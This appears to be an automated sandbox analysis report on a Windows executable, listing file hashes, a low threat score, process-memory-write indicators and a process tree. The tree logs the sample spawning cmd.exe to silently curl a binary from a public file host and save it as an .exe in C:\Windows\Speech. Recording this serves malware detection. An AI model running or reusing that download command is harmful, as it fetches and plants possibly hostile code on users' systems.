152aad5f51fc4b3556da017138ccff2b5a27a320fbf9b5b0d290f148cfc144a1

Analysis

max time kernel
117s
max time network
123s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
01-10-2024 01:04

Target

152aad5f51fc4b3556da017138ccff2b5a27a320fbf9b5b0d290f148cfc144a1.exe
Size

393KB
MD5

63e1f3ecfb67565483ff6194e7c53f20
SHA1

857a5f30ab5961b9bce69129b20479b57659baaf
SHA256

152aad5f51fc4b3556da017138ccff2b5a27a320fbf9b5b0d290f148cfc144a1
SHA512

ac102522f29c311e0e513f8258de446da621b9f0c95f34dfc94da87777830252015397c8a08022a35b40a193421b3f41a7ccd73edde95f62cbeb7573b198be99
SSDEEP

6144:UUSPdVs/kAYrtfUnLopuKbEz43Ws+Y/jJQDlrIVpVsrZCzNnG9prZ8:ygaE0+gXNn

Score

1^/10

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1868 wrote to memory of 2708	1868	152aad5f51fc4b3556da017138ccff2b5a27a320fbf9b5b0d290f148cfc144a1.exe	31
PID 1868 wrote to memory of 2708	1868	152aad5f51fc4b3556da017138ccff2b5a27a320fbf9b5b0d290f148cfc144a1.exe	31
PID 1868 wrote to memory of 2708	1868	152aad5f51fc4b3556da017138ccff2b5a27a320fbf9b5b0d290f148cfc144a1.exe	31

C:\Users\Admin\AppData\Local\Temp\152aad5f51fc4b3556da017138ccff2b5a27a320fbf9b5b0d290f148cfc144a1.exe
"C:\Users\Admin\AppData\Local\Temp\152aad5f51fc4b3556da017138ccff2b5a27a320fbf9b5b0d290f148cfc144a1.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/grb4ph.bin --output C:\Windows\Speech\physmeme.exe
  2⤵
  PID:2708